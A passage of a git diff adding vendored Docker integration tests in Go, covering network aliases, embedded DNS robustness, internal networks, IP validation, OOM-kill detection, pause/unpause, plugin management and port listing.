first container and its alias + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // ping first container's short-id alias + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid)) + c.Assert(err, check.IsNil) + + // connect first container to net2 network + dockerCmd(c, "network", "connect", "--alias=bar", "net2", "first") + // connect second container to foo2 network with a different alias for first container + dockerCmd(c, "network", "connect", "net2", "second") + + // ping the new alias in network foo2 + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar") + c.Assert(err, check.IsNil) + + // disconnect first container from net1 network + dockerCmd(c, "network", "disconnect", "net1", "first") + + // ping to net1 scoped alias "foo" must fail + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.NotNil) + + // ping to net2 scoped alias "bar" must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar") + c.Assert(err, check.IsNil) + // ping to net2 scoped alias short-id must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid)) + c.Assert(err, check.IsNil) + + // verify the alias option is rejected when running on predefined network + out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox", "top") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) + + // verify the alias option is rejected when connecting to predefined network + out, _, err = dockerCmdWithError("network", "connect", "--alias=any", "bridge", "first") + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) +} + +func (s *DockerSuite) TestUserDefinedNetworkConnectivity(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "network", "create", "-d", "bridge", "br.net1") + + dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox", "top") + c.Assert(waitRun("c1.net1"), check.IsNil) + + dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox", "top") + c.Assert(waitRun("c2.net1"), check.IsNil) + + // ping first container by its unqualified name + _, _, err := dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1") + c.Assert(err, check.IsNil) + + // ping first container by its qualified name + _, _, err = dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1.br.net1") + c.Assert(err, check.IsNil) + + // ping with first qualified name masked by an additional domain. should fail + _, _, err = dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1.br.net1.google.com") + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestEmbeddedDNSInvalidInput(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "network", "create", "-d", "bridge", "nw1") + + // Sending garbage to embedded DNS shouldn't crash the daemon + dockerCmd(c, "run", "-i", "--net=nw1", "--name=c1", "debian:jessie", "bash", "-c", "echo InvalidQuery > /dev/udp/127.0.0.11/53") +} + +func (s *DockerSuite) TestDockerNetworkConnectFailsNoInspectChange(c *check.C) { + dockerCmd(c, "run", "-d", "--name=bb", "busybox", "top") + c.Assert(waitRun("bb"), check.IsNil) + + ns0 := inspectField(c, "bb", "NetworkSettings.Networks.bridge") + + // A failing redundant network connect should not alter current container's endpoint settings + _, _, err := dockerCmdWithError("network", "connect", "bridge", "bb") + c.Assert(err, check.NotNil) + + ns1 := inspectField(c, "bb", "NetworkSettings.Networks.bridge") + c.Assert(ns1, check.Equals, ns0) +} + +func (s *DockerSuite) TestDockerNetworkInternalMode(c *check.C) { + dockerCmd(c, "network", "create", "--driver=bridge", "--internal", "internal") + assertNwIsAvailable(c, "internal") + nr := getNetworkResource(c, "internal") + c.Assert(nr.Internal, checker.True) + + dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + out, _, err := dockerCmdWithError("exec", "first", "ping", "-W", "4", "-c", "1", "www.google.com") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "ping: bad address") + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +// Test for #21401 +func (s *DockerNetworkSuite) TestDockerNetworkCreateDeleteSpecialCharacters(c *check.C) { + dockerCmd(c, "network", "create", "test@#$") + assertNwIsAvailable(c, "test@#$") + dockerCmd(c, "network", "rm", "test@#$") + assertNwNotAvailable(c, "test@#$") + + dockerCmd(c, "network", "create", "kiwl$%^") + assertNwIsAvailable(c, "kiwl$%^") + dockerCmd(c, "network", "rm", "kiwl$%^") + assertNwNotAvailable(c, "kiwl$%^") +} + +func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) { + testRequires(t, DaemonIsLinux) + if err := s.d.StartWithBusybox("--live-restore"); err != nil { + t.Fatal(err) + } + defer s.d.Stop() + oldCon := "old" + + _, err := s.d.Cmd("run", "-d", "--name", oldCon, "-p", "80:80", "busybox", "top") + if err != nil { + t.Fatal(err) + } + oldContainerIP, err := s.d.Cmd("inspect", "-f", "{{ .NetworkSettings.Networks.bridge.IPAddress }}", oldCon) + if err != nil { + t.Fatal(err) + } + // Kill the daemon + if err := s.d.Kill(); err != nil { + t.Fatal(err) + } + + // restart the daemon + if err := s.d.Start("--live-restore"); err != nil { + t.Fatal(err) + } + + // start a new container, the new container's ip should not be the same with + // old running container. + newCon := "new" + _, err = s.d.Cmd("run", "-d", "--name", newCon, "busybox", "top") + if err != nil { + t.Fatal(err) + } + newContainerIP, err := s.d.Cmd("inspect", "-f", "{{ .NetworkSettings.Networks.bridge.IPAddress }}", newCon) + if err != nil { + t.Fatal(err) + } + if strings.Compare(strings.TrimSpace(oldContainerIP), strings.TrimSpace(newContainerIP)) == 0 { + t.Fatalf("new container ip should not equal to old running container ip") + } + + // start a new container, the new container should ping old running container + _, err = s.d.Cmd("run", "-t", "busybox", "ping", "-c", "1", oldContainerIP) + if err != nil { + t.Fatal(err) + } + + // start a new container, trying to publish port 80:80 should fail + out, err := s.d.Cmd("run", "-p", "80:80", "-d", "busybox", "top") + if err == nil || !strings.Contains(out, "Bind for 0.0.0.0:80 failed: port is already allocated") { + t.Fatalf("80 port is allocated to old running container, it should failed on allocating to new container") + } + + // kill old running container and try to allocate again + _, err = s.d.Cmd("kill", oldCon) + if err != nil { + t.Fatal(err) + } + id, err := s.d.Cmd("run", "-p", "80:80", "-d", "busybox", "top") + if err != nil { + t.Fatal(err) + } + + // Cleanup because these containers will not be shut down by daemon + out, err = s.d.Cmd("stop", newCon) + if err != nil { + t.Fatalf("err: %v %v", err, string(out)) + } + _, err = s.d.Cmd("stop", strings.TrimSpace(id)) + if err != nil { + t.Fatal(err) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkFlagAlias(c *check.C) { + dockerCmd(c, "network", "create", "user") + output, status := dockerCmd(c, "run", "--rm", "--network=user", "--network-alias=foo", "busybox", "true") + c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output)) + + output, status, _ = dockerCmdWithError("run", "--rm", "--net=user", "--network=user", "busybox", "true") + c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output)) + + output, status, _ = dockerCmdWithError("run", "--rm", "--network=user", "--net-alias=foo", "--network-alias=bar", "busybox", "true") + c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkValidateIP(c *check.C) { + _, _, err := dockerCmdWithError("network", "create", "--ipv6", "--subnet=172.28.0.0/16", "--subnet=2001:db8:1234::/64", "mynet") + c.Assert(err, check.IsNil) + assertNwIsAvailable(c, "mynet") + + _, _, err = dockerCmdWithError("run", "-d", "--name", "mynet0", "--net=mynet", "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top") + c.Assert(err, check.IsNil) + c.Assert(waitRun("mynet0"), check.IsNil) + verifyIPAddressConfig(c, "mynet0", "mynet", "172.28.99.88", "2001:db8:1234::9988") + verifyIPAddresses(c, "mynet0", "mynet", "172.28.99.88", "2001:db8:1234::9988") + + _, _, err = dockerCmdWithError("run", "--net=mynet", "--ip", "mynet_ip", "--ip6", "2001:db8:1234::9999", "busybox", "top") + c.Assert(err.Error(), checker.Contains, "invalid IPv4 address") + _, _, err = dockerCmdWithError("run", "--net=mynet", "--ip", "172.28.99.99", "--ip6", "mynet_ip6", "busybox", "top") + c.Assert(err.Error(), checker.Contains, "invalid IPv6 address") + // This is a case of IPv4 address to `--ip6` + _, _, err = dockerCmdWithError("run", "--net=mynet", "--ip6", "172.28.99.99", "busybox", "top") + c.Assert(err.Error(), checker.Contains, "invalid IPv6 address") + // This is a special case of an IPv4-mapped IPv6 address + _, _, err = dockerCmdWithError("run", "--net=mynet", "--ip6", "::ffff:172.28.99.99", "busybox", "top") + c.Assert(err.Error(), checker.Contains, "invalid IPv6 address") +} + +// Test case for 26220 +func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromBridge(c *check.C) { + out, _ := dockerCmd(c, "network", "inspect", "--format", "{{.Id}}", "bridge") + + network := strings.TrimSpace(out) + + name := "test" + dockerCmd(c, "create", "--name", name, "busybox", "top") + + _, _, err := dockerCmdWithError("network", "disconnect", network, name) + c.Assert(err, check.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go new file mode 100644 index 0000000000..bcf59f8601 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go @@ -0,0 +1,30 @@ +// +build !windows + +package main + +import ( + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestInspectOomKilledTrue(c *check.C) { + testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport) + + name := "testoomkilled" + _, exitCode, _ := dockerCmdWithError("run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + + c.Assert(exitCode, checker.Equals, 137, check.Commentf("OOM exit should be 137")) + + oomKilled := inspectField(c, name, "State.OOMKilled") + c.Assert(oomKilled, checker.Equals, "true") +} + +func (s *DockerSuite) TestInspectOomKilledFalse(c *check.C) { + testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport) + + name := "testoomkilled" + dockerCmd(c, "run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "echo hello world") + + oomKilled := inspectField(c, name, "State.OOMKilled") + c.Assert(oomKilled, checker.Equals, "false") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go new file mode 100644 index 0000000000..9217a69968 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go @@ -0,0 +1,66 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestPause(c *check.C) { + testRequires(c, IsPausable) + defer unpauseAllContainers() + + name := "testeventpause" + runSleepingContainer(c, "-d", "--name", name) + + dockerCmd(c, "pause", name) + pausedContainers, err := getSliceOfPausedContainers() + c.Assert(err, checker.IsNil) + c.Assert(len(pausedContainers), checker.Equals, 1) + + dockerCmd(c, "unpause", name) + + out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + actions := eventActionsByIDAndType(c, events, name, "container") + + c.Assert(actions[len(actions)-2], checker.Equals, "pause") + c.Assert(actions[len(actions)-1], checker.Equals, "unpause") +} + +func (s *DockerSuite) TestPauseMultipleContainers(c *check.C) { + testRequires(c, IsPausable) + defer unpauseAllContainers() + + containers := []string{ + "testpausewithmorecontainers1", + "testpausewithmorecontainers2", + } + for _, name := range containers { + runSleepingContainer(c, "-d", "--name", name) + } + dockerCmd(c, append([]string{"pause"}, containers...)...) + pausedContainers, err := getSliceOfPausedContainers() + c.Assert(err, checker.IsNil) + c.Assert(len(pausedContainers), checker.Equals, len(containers)) + + dockerCmd(c, append([]string{"unpause"}, containers...)...) + + out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + + for _, name := range containers { + actions := eventActionsByIDAndType(c, events, name, "container") + + c.Assert(actions[len(actions)-2], checker.Equals, "pause") + c.Assert(actions[len(actions)-1], checker.Equals, "unpause") + } +} + +func (s *DockerSuite) TestPauseFailsOnWindowsServerContainers(c *check.C) { + testRequires(c, DaemonIsWindows, NotPausable) + runSleepingContainer(c, "-d", "--name=test") + out, _, _ := dockerCmdWithError("pause", "test") + c.Assert(out, checker.Contains, "cannot pause Windows Server Containers") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go new file mode 100644 index 0000000000..380357d303 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go @@ -0,0 +1,393 @@ +package main + +import ( + "fmt" + "os/exec" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" + + "io/ioutil" + "os" + "path/filepath" + "strings" +) + +var ( + pluginProcessName = "sample-volume-plugin" + pName = "tiborvass/sample-volume-plugin" + npName = "tiborvass/test-docker-netplugin" + pTag = "latest" + pNameWithTag = pName + ":" + pTag + npNameWithTag = npName + ":" + pTag +) + +func (s *DockerSuite) TestPluginBasicOps(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, pTag) + c.Assert(out, checker.Contains, "true") + + id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag) + id = strings.TrimSpace(id) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "is enabled") + + _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) + + _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id)) + if !os.IsNotExist(err) { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestPluginForceRemove(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(out, checker.Contains, "is enabled") + + out, _, err = dockerCmdWithError("plugin", "remove", "--force", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) +} + +func (s *DockerSuite) TestPluginActive(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + _, _, err = dockerCmdWithError("volume", "create", "-d", pNameWithTag, "--name", "testvol1") + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(out, checker.Contains, "in use") + + _, _, err = dockerCmdWithError("volume", "rm", "testvol1") + c.Assert(err, checker.IsNil) + + _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) +} + +func (s *DockerSuite) TestPluginActiveNetwork(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", npNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("network", "create", "-d", npNameWithTag, "test") + c.Assert(err, checker.IsNil) + + nID := strings.TrimSpace(out) + + out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag) + c.Assert(out, checker.Contains, "is in use") + + _, _, err = dockerCmdWithError("network", "rm", nID) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag) + c.Assert(out, checker.Contains, "is enabled") + + _, _, err = dockerCmdWithError("plugin", "disable", npNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, npNameWithTag) +} + +func (s *DockerSuite) TestPluginInstallDisable(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", "--disable", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "false") + + out, _, err = dockerCmdWithError("plugin", "enable", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, _, err = dockerCmdWithError("plugin", "disable", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, _, err = dockerCmdWithError("plugin", "remove", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) +} + +func (s *DockerSuite) TestPluginInstallDisableVolumeLs(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", "--disable", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + dockerCmd(c, "volume", "ls") +} + +func (s *DockerSuite) TestPluginSet(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]") + + dockerCmd(c, "plugin", "set", pName, "DEBUG=1") + + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") +} + +func (s *DockerSuite) TestPluginInstallArgs(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName, "DEBUG=1") + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") +} + +func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64) + + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + // push the image to the registry + dockerCmd(c, "push", repoName) + + out, _, err := dockerCmdWithError("plugin", "install", repoName) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "target is image") +} + +func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, pName) + + out, _, err = dockerCmdWithError("plugin", "enable", pName) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "already enabled") + + _, _, err = dockerCmdWithError("plugin", "disable", pName) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "disable", pName) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "already disabled") + + _, _, err = dockerCmdWithError("plugin", "remove", pName) + c.Assert(err, checker.IsNil) +} + +func (s *DockerSuite) TestPluginCreate(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + name := "foo/bar-driver" + temp, err := ioutil.TempDir("", "foo") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(temp) + + data := `{"description": "foo plugin"}` + err = ioutil.WriteFile(filepath.Join(temp, "config.json"), []byte(data), 0644) + c.Assert(err, checker.IsNil) + + err = os.MkdirAll(filepath.Join(temp, "rootfs"), 0700) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "create", name, temp) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, _, err = dockerCmdWithError("plugin", "create", name, temp) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "already exist") + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + // The output will consists of one HEADER line and one line of foo/bar-driver + c.Assert(len(strings.Split(strings.TrimSpace(out), "\n")), checker.Equals, 2) +} + +func (s *DockerSuite) TestPluginInspect(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, pTag) + c.Assert(out, checker.Contains, "true") + + // Find the ID first + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag) + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + c.Assert(id, checker.Not(checker.Equals), "") + + // Long form + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, id) + + // Short form + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id[:5]) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, id) + + // Name with tag form + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, id) + + // Name without tag form + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, id) + + _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) + + // After remove nothing should be found + _, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id[:5]) + c.Assert(err, checker.NotNil) +} + +// Test case for https://github.com/docker/docker/pull/29186#discussion_r91277345 +func (s *DockerSuite) TestPluginInspectOnWindows(c *check.C) { + // This test should work on Windows only + testRequires(c, DaemonIsWindows) + + out, _, err := dockerCmdWithError("plugin", "inspect", "foobar") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "plugins are not supported on this platform") + c.Assert(err.Error(), checker.Contains, "plugins are not supported on this platform") +} + +func (s *DockerTrustSuite) TestPluginTrustedInstall(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + trustedName := s.setupTrustedplugin(c, pNameWithTag, "trusted-plugin-install") + + installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", trustedName) + s.trustedCmd(installCmd) + out, _, err := runCommandWithOutput(installCmd) + + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "true") + + out, _, err = dockerCmdWithError("plugin", "disable", trustedName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + + out, _, err = dockerCmdWithError("plugin", "enable", trustedName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + + out, _, err = dockerCmdWithError("plugin", "rm", "-f", trustedName) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + + // Try untrusted pull to ensure we pushed the tag to the registry + installCmd = exec.Command(dockerBinary, "plugin", "install", "--disable-content-trust=true", "--grant-all-permissions", trustedName) + s.trustedCmd(installCmd) + out, _, err = runCommandWithOutput(installCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) + + out, _, err = dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "true") + +} + +func (s *DockerTrustSuite) TestPluginUntrustedInstall(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + pluginName := fmt.Sprintf("%v/dockercliuntrusted/plugintest:latest", privateRegistryURL) + // install locally and push to private registry + dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", pluginName, pNameWithTag) + dockerCmd(c, "plugin", "push", pluginName) + dockerCmd(c, "plugin", "rm", "-f", pluginName) + + // Try trusted install on untrusted plugin + installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", pluginName) + s.trustedCmd(installCmd) + out, _, err := runCommandWithOutput(installCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) +} + +func (s *DockerSuite) TestPluginUpgrade(c *check.C) { + testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64) + plugin := "cpuguy83/docker-volume-driver-plugin-local:latest" + pluginV2 := "cpuguy83/docker-volume-driver-plugin-local:v2" + + dockerCmd(c, "plugin", "install", "--grant-all-permissions", plugin) + dockerCmd(c, "volume", "create", "--driver", plugin, "bananas") + dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "touch /apple/core") + + out, _, err := dockerCmdWithError("plugin", "upgrade", "--grant-all-permissions", plugin, pluginV2) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "disabled before upgrading") + + out, _ = dockerCmd(c, "plugin", "inspect", "--format={{.ID}}", plugin) + id := strings.TrimSpace(out) + + // make sure "v2" does not exists + _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2")) + c.Assert(os.IsNotExist(err), checker.True, check.Commentf(out)) + + dockerCmd(c, "plugin", "disable", "-f", plugin) + dockerCmd(c, "plugin", "upgrade", "--grant-all-permissions", "--skip-remote-check", plugin, pluginV2) + + // make sure "v2" file exists + _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2")) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "plugin", "enable", plugin) + dockerCmd(c, "volume", "inspect", "bananas") + dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "ls -lh /apple/core") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go new file mode 100644 index 0000000000..80b00fe93e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go @@ -0,0 +1,319 @@ +package main + +import ( + "fmt" + "net" + "regexp" + "sort" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestPortList(c *check.C) { + testRequires(c, DaemonIsLinux) + // one port + out, _ := dockerCmd(c, "run", "-d", "-p", "9876:80", "busybox", "top") + firstID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", firstID, "80") + + err := assertPortList(c, out, []string{"0.0.0.0:9876"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "port", firstID) + + err = assertPortList(c, out, []string{"80/tcp -> 0.0.0.0:9876"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + dockerCmd(c, "rm", "-f", firstID) + + // three port + out, _ = dockerCmd(c, "run", "-d", + "-p", "9876:80", + "-p", "9877:81", + "-p", "9878:82", + "busybox", "top") + ID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", ID, "80") + + err = assertPortList(c, out, []string{"0.0.0.0:9876"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "port", ID) + + err = assertPortList(c, out, []string{ + "80/tcp -> 0.0.0.0:9876", + "81/tcp -> 0.0.0.0:9877", + "82/tcp -> 0.0.0.0:9878"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + dockerCmd(c, "rm", "-f", ID) + + // more and one port mapped to the same container port + out, _ = dockerCmd(c, "run", 